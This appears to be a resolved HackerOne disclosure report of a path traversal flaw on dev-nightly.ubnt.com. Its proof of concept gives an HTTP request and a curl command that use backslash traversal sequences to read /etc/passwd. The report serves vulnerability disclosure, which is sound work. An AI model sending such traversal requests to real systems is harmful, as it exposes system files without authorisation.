[dev-nightly.ubnt.com] Local File Reading
High
Vulnerability Details
**Description**
Reading files outside the web root via path traversal
**PoC**
```http
GET /..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd HTTP/1.1
Host: dev-nightly.ubnt.com
```
```
curl "https://dev-nightly.ubnt.com/..\..\..\etc\passwd"
```
**Result**
{F213057}
Actions
View on HackerOneReport Stats
- Report ID: 260420
- State: Closed
- Substate: resolved
- Upvotes: 31